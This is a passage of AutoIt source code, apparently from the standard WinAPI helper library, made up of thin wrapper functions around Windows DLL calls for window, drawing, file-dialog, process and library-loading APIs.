		$aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $ptrrect, "handle", $hbrush)
	Else
		$aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $ptrrect, "dword_ptr", $hbrush)
	EndIf
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_findexecutable($sfilename, $sdirectory = "")
	Local $aresult = DllCall("shell32.dll", "INT", "FindExecutableW", "wstr", $sfilename, "wstr", $sdirectory, "wstr", "")
	If @error Then Return SetError(@error, @extended, 0)
	Return SetExtended($aresult[0], $aresult[3])
EndFunc

Func _winapi_findwindow($sclassname, $swindowname)
	Local $aresult = DllCall("user32.dll", "hwnd", "FindWindowW", "wstr", $sclassname, "wstr", $swindowname)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_flashwindow($hwnd, $finvert = True)
	Local $aresult = DllCall("user32.dll", "bool", "FlashWindow", "hwnd", $hwnd, "bool", $finvert)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_flashwindowex($hwnd, $iflags = 3, $icount = 3, $itimeout = 0)
	Local $tflash = DllStructCreate($tagflashwinfo)
	Local $iflash = DllStructGetSize($tflash)
	Local $imode = 0
	If BitAND($iflags, 1) <> 0 Then $imode = BitOR($imode, $__winapiconstant_flashw_caption)
	If BitAND($iflags, 2) <> 0 Then $imode = BitOR($imode, $__winapiconstant_flashw_tray)
	If BitAND($iflags, 4) <> 0 Then $imode = BitOR($imode, $__winapiconstant_flashw_timer)
	If BitAND($iflags, 8) <> 0 Then $imode = BitOR($imode, $__winapiconstant_flashw_timernofg)
	DllStructSetData($tflash, "Size", $iflash)
	DllStructSetData($tflash, "hWnd", $hwnd)
	DllStructSetData($tflash, "Flags", $imode)
	DllStructSetData($tflash, "Count", $icount)
	DllStructSetData($tflash, "Timeout", $itimeout)
	Local $aresult = DllCall("user32.dll", "bool", "FlashWindowEx", "struct*", $tflash)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_floattoint($nfloat)
	Local $tfloat = DllStructCreate("float")
	Local $tint = DllStructCreate("int", DllStructGetPtr($tfloat))
	DllStructSetData($tfloat, 1, $nfloat)
	Return DllStructGetData($tint, 1)
EndFunc

Func _winapi_flushfilebuffers($hfile)
	Local $aresult = DllCall("kernel32.dll", "bool", "FlushFileBuffers", "handle", $hfile)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_formatmessage($iflags, $psource, $imessageid, $ilanguageid, ByRef $pbuffer, $isize, $varguments)
	Local $sbuffertype = "struct*"
	If IsString($pbuffer) Then $sbuffertype = "wstr"
	Local $aresult = DllCall("Kernel32.dll", "dword", "FormatMessageW", "dword", $iflags, "ptr", $psource, "dword", $imessageid, "dword", $ilanguageid, $sbuffertype, $pbuffer, "dword", $isize, "ptr", $varguments)
	If @error Then Return SetError(@error, @extended, 0)
	If $sbuffertype = "wstr" Then $pbuffer = $aresult[5]
	Return $aresult[0]
EndFunc

Func _winapi_framerect($hdc, $ptrrect, $hbrush)
	Local $aresult = DllCall("user32.dll", "int", "FrameRect", "handle", $hdc, "ptr", $ptrrect, "handle", $hbrush)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_freelibrary($hmodule)
	Local $aresult = DllCall("kernel32.dll", "bool", "FreeLibrary", "handle", $hmodule)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_getancestor($hwnd, $iflags = 1)
	Local $aresult = DllCall("user32.dll", "hwnd", "GetAncestor", "hwnd", $hwnd, "uint", $iflags)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getasynckeystate($ikey)
	Local $aresult = DllCall("user32.dll", "short", "GetAsyncKeyState", "int", $ikey)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getbkmode($hdc)
	Local $aresult = DllCall("gdi32.dll", "int", "GetBkMode", "handle", $hdc)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getclassname($hwnd)
	If NOT IsHWnd($hwnd) Then $hwnd = GUICtrlGetHandle($hwnd)
	Local $aresult = DllCall("user32.dll", "int", "GetClassNameW", "hwnd", $hwnd, "wstr", "", "int", 4096)
	If @error Then Return SetError(@error, @extended, False)
	Return SetExtended($aresult[0], $aresult[2])
EndFunc

Func _winapi_getclientheight($hwnd)
	Local $trect = _winapi_getclientrect($hwnd)
	If @error Then Return SetError(@error, @extended, 0)
	Return DllStructGetData($trect, "Bottom") - DllStructGetData($trect, "Top")
EndFunc

Func _winapi_getclientwidth($hwnd)
	Local $trect = _winapi_getclientrect($hwnd)
	If @error Then Return SetError(@error, @extended, 0)
	Return DllStructGetData($trect, "Right") - DllStructGetData($trect, "Left")
EndFunc

Func _winapi_getclientrect($hwnd)
	Local $trect = DllStructCreate($tagrect)
	DllCall("user32.dll", "bool", "GetClientRect", "hwnd", $hwnd, "struct*", $trect)
	If @error Then Return SetError(@error, @extended, 0)
	Return $trect
EndFunc

Func _winapi_getcurrentprocess()
	Local $aresult = DllCall("kernel32.dll", "handle", "GetCurrentProcess")
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getcurrentprocessid()
	Local $aresult = DllCall("kernel32.dll", "dword", "GetCurrentProcessId")
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getcurrentthread()
	Local $aresult = DllCall("kernel32.dll", "handle", "GetCurrentThread")
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getcurrentthreadid()
	Local $aresult = DllCall("kernel32.dll", "dword", "GetCurrentThreadId")
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getcursorinfo()
	Local $tcursor = DllStructCreate($tagcursorinfo)
	Local $icursor = DllStructGetSize($tcursor)
	DllStructSetData($tcursor, "Size", $icursor)
	DllCall("user32.dll", "bool", "GetCursorInfo", "struct*", $tcursor)
	If @error Then Return SetError(@error, @extended, 0)
	Local $acursor[5]
	$acursor[0] = True
	$acursor[1] = DllStructGetData($tcursor, "Flags") <> 0
	$acursor[2] = DllStructGetData($tcursor, "hCursor")
	$acursor[3] = DllStructGetData($tcursor, "X")
	$acursor[4] = DllStructGetData($tcursor, "Y")
	Return $acursor
EndFunc

Func _winapi_getdc($hwnd)
	Local $aresult = DllCall("user32.dll", "handle", "GetDC", "hwnd", $hwnd)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getdesktopwindow()
	Local $aresult = DllCall("user32.dll", "hwnd", "GetDesktopWindow")
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getdevicecaps($hdc, $iindex)
	Local $aresult = DllCall("gdi32.dll", "int", "GetDeviceCaps", "handle", $hdc, "int", $iindex)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getdibits($hdc, $hbmp, $istartscan, $iscanlines, $pbits, $pbi, $iusage)
	Local $aresult = DllCall("gdi32.dll", "int", "GetDIBits", "handle", $hdc, "handle", $hbmp, "uint", $istartscan, "uint", $iscanlines, "ptr", $pbits, "ptr", $pbi, "uint", $iusage)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_getdlgctrlid($hwnd)
	Local $aresult = DllCall("user32.dll", "int", "GetDlgCtrlID", "hwnd", $hwnd)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getdlgitem($hwnd, $iitemid)
	Local $aresult = DllCall("user32.dll", "hwnd", "GetDlgItem", "hwnd", $hwnd, "int", $iitemid)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getfocus()
	Local $aresult = DllCall("user32.dll", "hwnd", "GetFocus")
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getforegroundwindow()
	Local $aresult = DllCall("user32.dll", "hwnd", "GetForegroundWindow")
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getguiresources($iflag = 0, $hprocess = -1)
	If $hprocess = -1 Then $hprocess = _winapi_getcurrentprocess()
	Local $aresult = DllCall("user32.dll", "dword", "GetGuiResources", "handle", $hprocess, "dword", $iflag)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_geticoninfo($hicon)
	Local $tinfo = DllStructCreate($tagiconinfo)
	DllCall("user32.dll", "bool", "GetIconInfo", "handle", $hicon, "struct*", $tinfo)
	If @error Then Return SetError(@error, @extended, 0)
	Local $aicon[6]
	$aicon[0] = True
	$aicon[1] = DllStructGetData($tinfo, "Icon") <> 0
	$aicon[2] = DllStructGetData($tinfo, "XHotSpot")
	$aicon[3] = DllStructGetData($tinfo, "YHotSpot")
	$aicon[4] = DllStructGetData($tinfo, "hMask")
	$aicon[5] = DllStructGetData($tinfo, "hColor")
	Return $aicon
EndFunc

Func _winapi_getfilesizeex($hfile)
	Local $aresult = DllCall("kernel32.dll", "bool", "GetFileSizeEx", "handle", $hfile, "int64*", 0)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[2]
EndFunc

Func _winapi_getlasterrormessage()
	Local $tbufferptr = DllStructCreate("ptr")
	Local $ncount = _winapi_formatmessage(BitOR($__winapiconstant_format_message_allocate_buffer, $__winapiconstant_format_message_from_system), 0, _winapi_getlasterror(), 0, $tbufferptr, 0, 0)
	If @error Then Return SetError(@error, 0, "")
	Local $stext = ""
	Local $pbuffer = DllStructGetData($tbufferptr, 1)
	If $pbuffer Then
		If $ncount > 0 Then
			Local $tbuffer = DllStructCreate("wchar[" & ($ncount + 1) & "]", $pbuffer)
			$stext = DllStructGetData($tbuffer, 1)
		EndIf
		_winapi_localfree($pbuffer)
	EndIf
	Return $stext
EndFunc

Func _winapi_getlayeredwindowattributes($hwnd, ByRef $i_transcolor, ByRef $transparency, $ascolorref = False)
	$i_transcolor = -1
	$transparency = -1
	Local $aresult = DllCall("user32.dll", "bool", "GetLayeredWindowAttributes", "hwnd", $hwnd, "dword*", $i_transcolor, "byte*", $transparency, "dword*", 0)
	If @error Then Return SetError(@error, @extended, 0)
	If NOT $ascolorref Then
		$aresult[2] = Int(BinaryMid($aresult[2], 3, 1) & BinaryMid($aresult[2], 2, 1) & BinaryMid($aresult[2], 1, 1))
	EndIf
	$i_transcolor = $aresult[2]
	$transparency = $aresult[3]
	Return $aresult[4]
EndFunc

Func _winapi_getmodulehandle($smodulename)
	Local $smodulenametype = "wstr"
	If $smodulename = "" Then
		$smodulename = 0
		$smodulenametype = "ptr"
	EndIf
	Local $aresult = DllCall("kernel32.dll", "handle", "GetModuleHandleW", $smodulenametype, $smodulename)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getmousepos($ftoclient = False, $hwnd = 0)
	Local $imode = Opt("MouseCoordMode", 1)
	Local $apos = MouseGetPos()
	Opt("MouseCoordMode", $imode)
	Local $tpoint = DllStructCreate($tagpoint)
	DllStructSetData($tpoint, "X", $apos[0])
	DllStructSetData($tpoint, "Y", $apos[1])
	If $ftoclient Then
		_winapi_screentoclient($hwnd, $tpoint)
		If @error Then Return SetError(@error, @extended, 0)
	EndIf
	Return $tpoint
EndFunc

Func _winapi_getmouseposx($ftoclient = False, $hwnd = 0)
	Local $tpoint = _winapi_getmousepos($ftoclient, $hwnd)
	If @error Then Return SetError(@error, @extended, 0)
	Return DllStructGetData($tpoint, "X")
EndFunc

Func _winapi_getmouseposy($ftoclient = False, $hwnd = 0)
	Local $tpoint = _winapi_getmousepos($ftoclient, $hwnd)
	If @error Then Return SetError(@error, @extended, 0)
	Return DllStructGetData($tpoint, "Y")
EndFunc

Func _winapi_getobject($hobject, $isize, $pobject)
	Local $aresult = DllCall("gdi32.dll", "int", "GetObjectW", "handle", $hobject, "int", $isize, "ptr", $pobject)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getopenfilename($stitle = "", $sfilter = "All files (*.*)", $sinitaldir = ".", $sdefaultfile = "", $sdefaultext = "", $ifilterindex = 1, $iflags = 0, $iflagsex = 0, $hwndowner = 0)
	Local $ipathlen = 4096
	Local $inulls = 0
	Local $tofn = DllStructCreate($tagopenfilename)
	Local $afiles[1] = [0]
	Local $iflag = $iflags
	Local $asflines = StringSplit($sfilter, "|")
	Local $asfilter[$asflines[0] * 2 + 1]
	Local $istart, $ifinal, $stfilter
	$asfilter[0] = $asflines[0] * 2
	For $i = 1 To $asflines[0]
		$istart = StringInStr($asflines[$i], "(", 0, 1)
		$ifinal = StringInStr($asflines[$i], ")", 0, -1)
		$asfilter[$i * 2 - 1] = StringStripWS(StringLeft($asflines[$i], $istart - 1), 3)
		$asfilter[$i * 2] = StringStripWS(StringTrimRight(StringTrimLeft($asflines[$i], $istart), StringLen($asflines[$i]) - $ifinal + 1), 3)
		$stfilter &= "wchar[" & StringLen($asfilter[$i * 2 - 1]) + 1 & "];wchar[" & StringLen($asfilter[$i * 2]) + 1 & "];"
	Next
	Local $ttitle = DllStructCreate("wchar Title[" & StringLen($stitle) + 1 & "]")
	Local $tinitialdir = DllStructCreate("wchar InitDir[" & StringLen($sinitaldir) + 1 & "]")
	Local $tfilter = DllStructCreate($stfilter & "wchar")
	Local $tpath = DllStructCreate("wchar Path[" & $ipathlen & "]")
	Local $textn = DllStructCreate("wchar Extension[" & StringLen($sdefaultext) + 1 & "]")
	For $i = 1 To $asfilter[0]
		DllStructSetData($tfilter, $i, $asfilter[$i])
	Next
	DllStructSetData($ttitle, "Title", $stitle)
	DllStructSetData($tinitialdir, "InitDir", $sinitaldir)
	DllStructSetData($tpath, "Path", $sdefaultfile)
	DllStructSetData($textn, "Extension", $sdefaultext)
	DllStructSetData($tofn, "StructSize", DllStructGetSize($tofn))
	DllStructSetData($tofn, "hwndOwner", $hwndowner)
	DllStructSetData($tofn, "lpstrFilter", DllStructGetPtr($tfilter))
	DllStructSetData($tofn, "nFilterIndex", $ifilterindex)
	DllStructSetData($tofn, "lpstrFile", DllStructGetPtr($tpath))
	DllStructSetData($tofn, "nMaxFile", $ipathlen)
	DllStructSetData($tofn, "lpstrInitialDir", DllStructGetPtr($tinitialdir))
	DllStructSetData($tofn, "lpstrTitle", DllStructGetPtr($ttitle))
	DllStructSetData($tofn, "Flags", $iflag)
	DllStructSetData($tofn, "lpstrDefExt", DllStructGetPtr($textn))
	DllStructSetData($tofn, "FlagsEx", $iflagsex)
	DllCall("comdlg32.dll", "bool", "GetOpenFileNameW", "struct*", $tofn)
	If @error Then Return SetError(@error, @extended, $afiles)
	If BitAND($iflags, $ofn_allowmultiselect) = $ofn_allowmultiselect AND BitAND($iflags, $ofn_explorer) = $ofn_explorer Then
		For $x = 1 To $ipathlen
			If DllStructGetData($tpath, "Path", $x) = Chr(0) Then
				DllStructSetData($tpath, "Path", "|", $x)
				$inulls += 1
			Else
				$inulls = 0
			EndIf
			If $inulls = 2 Then ExitLoop 
		Next
		DllStructSetData($tpath, "Path", Chr(0), $x - 1)
		$afiles = StringSplit(DllStructGetData($tpath, "Path"), "|")
		If $afiles[0] = 1 Then Return __winapi_parsefiledialogpath(DllStructGetData($tpath, "Path"))
		Return StringSplit(DllStructGetData($tpath, "Path"), "|")
	ElseIf BitAND($iflags, $ofn_allowmultiselect) = $ofn_allowmultiselect Then
		$afiles = StringSplit(DllStructGetData($tpath, "Path"), " ")
		If $afiles[0] = 1 Then Return __winapi_parsefiledialogpath(DllStructGetData($tpath, "Path"))
		Return StringSplit(StringReplace(DllStructGetData($tpath, "Path"), " ", "|"), "|")
	Else
		Return __winapi_parsefiledialogpath(DllStructGetData($tpath, "Path"))
	EndIf
EndFunc

Func _winapi_getoverlappedresult($hfile, $poverlapped, ByRef $ibytes, $fwait = False)
	Local $aresult = DllCall("kernel32.dll", "bool", "GetOverlappedResult", "handle", $hfile, "ptr", $poverlapped, "dword*", 0, "bool", $fwait)
	If @error Then Return SetError(@error, @extended, False)
	$ibytes = $aresult[3]
	Return $aresult[0]
EndFunc

Func _winapi_getparent($hwnd)
	Local $aresult = DllCall("user32.dll", "hwnd", "GetParent", "hwnd", $hwnd)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getprocessaffinitymask($hprocess)
	Local $aresult = DllCall("kernel32.dll", "bool", "GetProcessAffinityMask", "handle", $hprocess, "dword_ptr*", 0, "dword_ptr*", 0)
	If @error Then Return SetError(@error, @extended, 0)
	Local $amask[3]
	$amask[0] = True
	$amask[1] = $aresult[2]
	$amask[2] = $aresult[3]
	Return $amask
EndFunc

Func _winapi_getsavefilename($stitle = "", $sfilter = "All files (*.*)", $sinitaldir = ".", $sdefaultfile = "", $sdefaultext = "", $ifilterindex = 1, $iflags = 0, $iflagsex = 0, $hwndowner = 0)
	Local $ipathlen = 4096
	Local $tofn = DllStructCreate($tagopenfilename)
	Local $afiles[1] = [0]
	Local $iflag = $iflags
	Local $asflines = StringSplit($sfilter, "|")
	Local $asfilter[$asflines[0] * 2 + 1]
	Local $istart, $ifinal, $stfilter
	$asfilter[0] = $asflines[0] * 2
	For $i = 1 To $asflines[0]
		$istart = StringInStr($asflines[$i], "(", 0, 1)
		$ifinal = StringInStr($asflines[$i], ")", 0, -1)
		$asfilter[$i * 2 - 1] = StringStripWS(StringLeft($asflines[$i], $istart - 1), 3)
		$asfilter[$i * 2] = StringStripWS(StringTrimRight(StringTrimLeft($asflines[$i], $istart), StringLen($asflines[$i]) - $ifinal + 1), 3)
		$stfilter &= "wchar[" & StringLen($asfilter[$i * 2 - 1]) + 1 & "];wchar[" & StringLen($asfilter[$i * 2]) + 1 & "];"
	Next
	Local $ttitle = DllStructCreate("wchar Title[" & StringLen($stitle) + 1 & "]")
	Local $tinitialdir = DllStructCreate("wchar InitDir[" & StringLen($sinitaldir) + 1 & "]")
	Local $tfilter = DllStructCreate($stfilter & "wchar")
	Local $tpath = DllStructCreate("wchar Path[" & $ipathlen & "]")
	Local $textn = DllStructCreate("wchar Extension[" & StringLen($sdefaultext) + 1 & "]")
	For $i = 1 To $asfilter[0]
		DllStructSetData($tfilter, $i, $asfilter[$i])
	Next
	DllStructSetData($ttitle, "Title", $stitle)
	DllStructSetData($tinitialdir, "InitDir", $sinitaldir)
	DllStructSetData($tpath, "Path", $sdefaultfile)
	DllStructSetData($textn, "Extension", $sdefaultext)
	DllStructSetData($tofn, "StructSize", DllStructGetSize($tofn))
	DllStructSetData($tofn, "hwndOwner", $hwndowner)
	DllStructSetData($tofn, "lpstrFilter", DllStructGetPtr($tfilter))
	DllStructSetData($tofn, "nFilterIndex", $ifilterindex)
	DllStructSetData($tofn, "lpstrFile", DllStructGetPtr($tpath))
	DllStructSetData($tofn, "nMaxFile", $ipathlen)
	DllStructSetData($tofn, "lpstrInitialDir", DllStructGetPtr($tinitialdir))
	DllStructSetData($tofn, "lpstrTitle", DllStructGetPtr($ttitle))
	DllStructSetData($tofn, "Flags", $iflag)
	DllStructSetData($tofn, "lpstrDefExt", DllStructGetPtr($textn))
	DllStructSetData($tofn, "FlagsEx", $iflagsex)
	DllCall("comdlg32.dll", "bool", "GetSaveFileNameW", "struct*", $tofn)
	If @error Then Return SetError(@error, @extended, $afiles)
	Return __winapi_parsefiledialogpath(DllStructGetData($tpath, "Path"))
EndFunc

Func _winapi_getstockobject($iobject)
	Local $aresult = DllCall("gdi32.dll", "handle", "GetStockObject", "int", $iobject)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getstdhandle($istdhandle)
	If $istdhandle < 0 OR $istdhandle > 2 Then Return SetError(2, 0, -1)
	Local Const $ahandle[3] = [-10, -11, -12]
	Local $aresult = DllCall("kernel32.dll", "handle", "GetStdHandle", "dword", $ahandle[$istdhandle])
	If @error Then Return SetError(@error, @extended, -1)
	Return $aresult[0]
EndFunc

Func _winapi_getsyscolor($iindex)
	Local $aresult = DllCall("user32.dll", "dword", "GetSysColor", "int", $iindex)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getsyscolorbrush($iindex)
	Local $aresult = DllCall("user32.dll", "handle", "GetSysColorBrush", "int", $iindex)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getsystemmetrics($iindex)
	Local $aresult = DllCall("user32.dll", "int", "GetSystemMetrics", "int", $iindex)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_gettextextentpoint32($hdc, $stext)
	Local $tsize = DllStructCreate($tagsize)
	Local $isize = StringLen($stext)
	DllCall("gdi32.dll", "bool", "GetTextExtentPoint32W", "handle", $hdc, "wstr", $stext, "int", $isize, "struct*", $tsize)
	If @error Then Return SetError(@error, @extended, 0)
	Return $tsize
EndFunc

Func _winapi_gettextmetrics($hdc)
	Local $ttextmetric = DllStructCreate($tagtextmetric)
	Local $ret = DllCall("gdi32.dll", "bool", "GetTextMetricsW", "handle", $hdc, "struct*", $ttextmetric)
	If @error Then Return SetError(@error, @extended, 0)
	If NOT $ret[0] Then Return SetError(-1, 0, 0)
	Return $ttextmetric
EndFunc

Func _winapi_getwindow($hwnd, $icmd)
	Local $aresult = DllCall("user32.dll", "hwnd", "GetWindow", "hwnd", $hwnd, "uint", $icmd)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getwindowdc($hwnd)
	Local $aresult = DllCall("user32.dll", "handle", "GetWindowDC", "hwnd", $hwnd)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getwindowheight($hwnd)
	Local $trect = _winapi_getwindowrect($hwnd)
	If @error Then Return SetError(@error, @extended, 0)
	Return DllStructGetData($trect, "Bottom") - DllStructGetData($trect, "Top")
EndFunc

Func _winapi_getwindowlong($hwnd, $iindex)
	Local $sfuncname = "GetWindowLongW"
	If @AutoItX64 Then $sfuncname = "GetWindowLongPtrW"
	Local $aresult = DllCall("user32.dll", "long_ptr", $sfuncname, "hwnd", $hwnd, "int", $iindex)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getwindowplacement($hwnd)
	Local $twindowplacement = DllStructCreate($tagwindowplacement)
	DllStructSetData($twindowplacement, "length", DllStructGetSize($twindowplacement))
	DllCall("user32.dll", "bool", "GetWindowPlacement", "hwnd", $hwnd, "struct*", $twindowplacement)
	If @error Then Return SetError(@error, @extended, 0)
	Return $twindowplacement
EndFunc

Func _winapi_getwindowrect($hwnd)
	Local $trect = DllStructCreate($tagrect)
	DllCall("user32.dll", "bool", "GetWindowRect", "hwnd", $hwnd, "struct*", $trect)
	If @error Then Return SetError(@error, @extended, 0)
	Return $trect
EndFunc

Func _winapi_getwindowrgn($hwnd, $hrgn)
	Local $aresult = DllCall("user32.dll", "int", "GetWindowRgn", "hwnd", $hwnd, "handle", $hrgn)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_getwindowtext($hwnd)
	Local $aresult = DllCall("user32.dll", "int", "GetWindowTextW", "hwnd", $hwnd, "wstr", "", "int", 4096)
	If @error Then Return SetError(@error, @extended, "")
	Return SetExtended($aresult[0], $aresult[2])
EndFunc

Func _winapi_getwindowthreadprocessid($hwnd, ByRef $ipid)
	Local $aresult = DllCall("user32.dll", "dword", "GetWindowThreadProcessId", "hwnd", $hwnd, "dword*", 0)
	If @error Then Return SetError(@error, @extended, 0)
	$ipid = $aresult[2]
	Return $aresult[0]
EndFunc

Func _winapi_getwindowwidth($hwnd)
	Local $trect = _winapi_getwindowrect($hwnd)
	If @error Then Return SetError(@error, @extended, 0)
	Return DllStructGetData($trect, "Right") - DllStructGetData($trect, "Left")
EndFunc

Func _winapi_getxyfrompoint(ByRef $tpoint, ByRef $ix, ByRef $iy)
	$ix = DllStructGetData($tpoint, "X")
	$iy = DllStructGetData($tpoint, "Y")
EndFunc

Func _winapi_globalmemorystatus()
	Local $tmem = DllStructCreate($tagmemorystatusex)
	Local $imem = DllStructGetSize($tmem)
	DllStructSetData($tmem, 1, $imem)
	DllCall("kernel32.dll", "none", "GlobalMemoryStatusEx", "ptr", $tmem)
	If @error Then Return SetError(@error, @extended, 0)
	Local $amem[7]
	$amem[0] = DllStructGetData($tmem, 2)
	$amem[1] = DllStructGetData($tmem, 3)
	$amem[2] = DllStructGetData($tmem, 4)
	$amem[3] = DllStructGetData($tmem, 5)
	$amem[4] = DllStructGetData($tmem, 6)
	$amem[5] = DllStructGetData($tmem, 7)
	$amem[6] = DllStructGetData($tmem, 8)
	Return $amem
EndFunc

Func _winapi_guidfromstring($sguid)
	Local $tguid = DllStructCreate($tagguid)
	_winapi_guidfromstringex($sguid, $tguid)
	If @error Then Return SetError(@error, @extended, 0)
	Return $tguid
EndFunc

Func _winapi_guidfromstringex($sguid, $pguid)
	Local $aresult = DllCall("ole32.dll", "long", "CLSIDFromString", "wstr", $sguid, "struct*", $pguid)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_hiword($ilong)
	Return BitShift($ilong, 16)
EndFunc

Func _winapi_inprocess($hwnd, ByRef $hlastwnd)
	If $hwnd = $hlastwnd Then Return True
	For $ii = $__gainprocess_winapi[0][0] To 1 Step -1
		If $hwnd = $__gainprocess_winapi[$ii][0] Then
			If $__gainprocess_winapi[$ii][1] Then
				$hlastwnd = $hwnd
				Return True
			Else
				Return False
			EndIf
		EndIf
	Next
	Local $iprocessid
	_winapi_getwindowthreadprocessid($hwnd, $iprocessid)
	Local $icount = $__gainprocess_winapi[0][0] + 1
	If $icount >= 64 Then $icount = 1
	$__gainprocess_winapi[0][0] = $icount
	$__gainprocess_winapi[$icount][0] = $hwnd
	$__gainprocess_winapi[$icount][1] = ($iprocessid = @AutoItPID)
	Return $__gainprocess_winapi[$icount][1]
EndFunc

Func _winapi_inttofloat($iint)
	Local $tint = DllStructCreate("int")
	Local $tfloat = DllStructCreate("float", DllStructGetPtr($tint))
	DllStructSetData($tint, 1, $iint)
	Return DllStructGetData($tfloat, 1)
EndFunc

Func _winapi_isclassname($hwnd, $sclassname)
	Local $sseparator = Opt("GUIDataSeparatorChar")
	Local $aclassname = StringSplit($sclassname, $sseparator)
	If NOT IsHWnd($hwnd) Then $hwnd = GUICtrlGetHandle($hwnd)
	Local $sclasscheck = _winapi_getclassname($hwnd)
	For $x = 1 To UBound($aclassname) - 1
		If StringUpper(StringMid($sclasscheck, 1, StringLen($aclassname[$x]))) = StringUpper($aclassname[$x]) Then Return True
	Next
	Return False
EndFunc

Func _winapi_iswindow($hwnd)
	Local $aresult = DllCall("user32.dll", "bool", "IsWindow", "hwnd", $hwnd)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_iswindowvisible($hwnd)
	Local $aresult = DllCall("user32.dll", "bool", "IsWindowVisible", "hwnd", $hwnd)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_invalidaterect($hwnd, $trect = 0, $ferase = True)
	Local $aresult = DllCall("user32.dll", "bool", "InvalidateRect", "hwnd", $hwnd, "struct*", $trect, "bool", $ferase)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_lineto($hdc, $ix, $iy)
	Local $aresult = DllCall("gdi32.dll", "bool", "LineTo", "handle", $hdc, "int", $ix, "int", $iy)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_loadbitmap($hinstance, $sbitmap)
	Local $sbitmaptype = "int"
	If IsString($sbitmap) Then $sbitmaptype = "wstr"
	Local $aresult = DllCall("user32.dll", "handle", "LoadBitmapW", "handle", $hinstance, $sbitmaptype, $sbitmap)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_loadimage($hinstance, $simage, $itype, $ixdesired, $iydesired, $iload)
	Local $aresult, $simagetype = "int"
	If IsString($simage) Then $simagetype = "wstr"
	$aresult = DllCall("user32.dll", "handle", "LoadImageW", "handle", $hinstance, $simagetype, $simage, "uint", $itype, "int", $ixdesired, "int", $iydesired, "uint", $iload)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_loadlibrary($sfilename)
	Local $aresult = DllCall("kernel32.dll", "handle", "LoadLibraryW", "wstr", $sfilename)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_loadlibraryex($sfilename, $iflags = 0)
	Local $aresult = DllCall("kernel32.dll", "handle", "LoadLibraryExW", "wstr", $sfilename, "ptr", 0, "dword", $iflags)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_loadshell32icon($iiconid)
	Local $ticons = DllStructCreate("ptr Data")
	Local $iicons = _winapi_extracticonex("shell32.dll", $iiconid, 0, $ticons, 1)
	If @error Then Return SetError(@error, @extended, 0)
	If $iicons <= 0 Then Return SetError(1, 0, 0)
	Return DllStructGetData($ticons, "Data")
EndFunc

Func _winapi_loadstring($hinstance, $istringid)
	Local $aresult = DllCall("user32.dll", "int", "LoadStringW", "handle", $hinstance, "uint", $istringid, "wstr", "", "int", 4096)
	If @error Then Return SetError(@error, @extended, "")
